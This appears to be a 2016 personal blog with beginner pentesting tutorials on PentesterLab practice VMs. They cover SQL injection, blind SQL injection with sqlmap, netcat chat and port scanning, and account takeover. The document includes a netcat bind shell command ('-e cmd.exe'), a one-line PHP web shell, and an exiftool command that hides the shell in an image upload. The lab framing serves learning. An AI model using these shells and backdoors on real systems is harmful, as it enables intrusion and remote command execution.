Minggu, 19 Juni 2016

sql injection

Good night everyone
so this night i'm going to show you how to do a sql injection. well you already know that i do blind sql injection in my older post but this time i'm going to do sql injection which is more easier than the blind sql injection

so i'm using two machine which is kalilinux, iso file which is from_sqli_to_shell_pg_edition_i386.iso (you can download the iso file from pentester lab  just type in the google "from sql to shell")

so fireup your kalilinux and the target machine. make sure you can ping the website. so this will be the page of the target website. and let just cut to the chase i try every link to find which one is link is vulnerable to sql injection by putting single quote to some url and yea i found it was at cat.php



so alternatively i can bruteforce the web directory to save time guessing the table name or column name



so there you go there is bunch list of your target web directories.

but if you want to do it manual first you have to determine by how many cplumn that are actually use u can use that with ORDER BY command so try to add some value to order by to determine how many column that they use.

so i got this error message when inserting 5 value at order by


so there is 4 column after determine the value lets figured what kind of type that they use you can test every parameter using UNION command





and after that you can also detect the version , current_user , database using union command


so we get all the necessary information lets indentify the column and table name by using this command





now for the fun part you can now retrieve admin account and password using this command
 ahah! we get the admin account and password but it was hash no worries we can solve this by two way either using search engine or john the ripper

so right now i'm using search engine to encode the hash just simply copy paste the hash and wala! there you go this hashes is already been encode to some website so the password was "P4ssw0rd"

 as you can see we now take control of the admin account now
have a nice day ^_^ i'm literally at the rooftop right now because the connection was bad at my flat

netcat (chat and remote shell)

so today i'm going to give you a tutorial how to use netcat to chat in different computer and for create remote shell

netcat for chat:

so this is pretty easy to do it so set up two different machine mine was kalilinux as the client and windows xp as the listeners.


for listeners type : nc -l -p 8390 (is up to you where to connect the port)
for client type:nc 171.16.139.134 (listeners ip address) 8390 (and the port that listeners set)

and wala ! you already can chat with two different machine to be noted this connection is not encrypted.








remote shell:
so before we start , what is remote shell? remote shell is a command line computer programming that will execute shell command as another user on another computer. so basically you can own another computer.in this tutorial i don't show you how to use remote shell for black hat stuff but i will show you for white hat stuff (logging file trouble shooting)

it's pretty easy

now my listener machine will be windows xp and kali linux will be the client

for the listener: nc -Lp 8390 (port number) -vv -e cmd.exe

-Lp=persistent listening mode
-vv-extra verbose mode (useful for transfering file)
-e =open security hole

 and at the client machine type : nc 172.16.139.134 (ip address listener) 8390 (port)
 and wala! you already the inside the system
 in this picture to show i already inside the listener machine i create one directory i_inside_you (yeah!)
cool huh?!

have a nice day ^_^

Sabtu, 18 Juni 2016

netcat for banner grabbing and port scanning

so you all must know about netcat right? netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. netcat can be use many thing from backdoor , chat, banner grabbing and also port scanning. but today i'm going to give a tutorial how to use netcat to banner grabbing and port scanning.

banner grabbing

so i use windows xp and it's already install netcat



as you can see the netcat retrieved back what server that they actually use but this kinda method its not really stealth because it will restore at the log server.

port scanning:
netcat can also be use for port scanning even though is not really sophisticated as nmap but netcat can be your alternative use

type "nc -v -w 1 target ip address -z range port"
-v=verbose
-w=timeout for connect
-z =for the range of port




as you can see some port will be closed inidicate with timeout and open port indicate with open

have a nice day ^_^

blind sql injection (from sql to shell II)

so today i'm going to show you how to conduct a blind sql injection in this tutorial i get the exercise from pentesterlab and here is the URL:https://pentesterlab.com/exercises/from_sqli_to_shell_II/

before get into the business, let me explain about what is blind sql injection . Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead..(http://www.cgisecurity.com/questions/blindsql.shtml)

so basically we don't try to search any error message so the back end of the database but we actually asks the database true or false questions and determines the answer based on the applications response. just like guessing game it more difficult compare to sql injection but even if the database error messages are turned off a hacker can still run a blind SQL injection attack.

set up all necessary tools
-Kali Linux (https://www.kali.org/)
-ISO Image of SQL Injection Lab (from_sqli_to_shell_II_i386.iso)

if you successfully run the ISO image type "ifconfig" to see the web ip address and type the ip address into your browser and i will load the webpage



this is one of the page that is web page have.
before do blind sql injection lets try to do a fingerprinting. in fingerprinting i use netcat and telnet(to crosscheck)


well as you can see the server that they using is nginx /0.7.67 and also use burpsuite and nmap to see the open port and to map the application but yeah i forgot to screenshoot the burpsuite

as you can see the os that they use linux 2.6.32 and only port 80  that is open and so from the list of the structure the web application . i actually try all the link of the web application to see if it vulnerable to blind sql injection using sqlmap

after a few couple of trial and error i find one link that is vulnerable blind sql injection which is "http://172.16.139.137/show.php"

 as you can see the when insert the link to sqlmap. sqlmap show that this link is vulnerable to blind sql injection. so from this information i try to exploit the database



now from this we know that there are two database information_schema and photoblog. now let's try to see the content of the photoblog table.






now from the photoblog database we can see that there is 4 table now we focus on the users table because it will contain username and password



 now from content of the table there are only one user which is admin but the password was hash. but you can actually use dictionary base attack to so real content of the hash

ahah! now from this we get the username and the password. go to the admin page and enter the password.


as you can see we finally take over the admin account. from here you can actually put a backdoor inside using php to execute the command. but in the administration page you can actually just store a picture inside the database so how to conceal backdoor inside the picture. well there is actually a lot of way to create but in this tutorial i use exiftool.

tool can inject the php code inside the image. simple code to create backdoor using php

"<?php $cmd=$_GET ['cmd'] ; system ($cmd); ?>"

i suggest you not separate the code into each line because when i try that the backdoor is not work.

now try to download any image an type this in order to create backdoor

"exiftool "-comment<=backdoor.php" image.png"

if it succeed you can remotely execute cmd command like this


 well in order to see the content click "view page source"

as you can see the backdoor is successfully injected to the web application pretty cool heehhhh!for suggestion try to update your sqlmap to give much satisfying result i run an older sqlmap for two days is not working

have a great day ^_^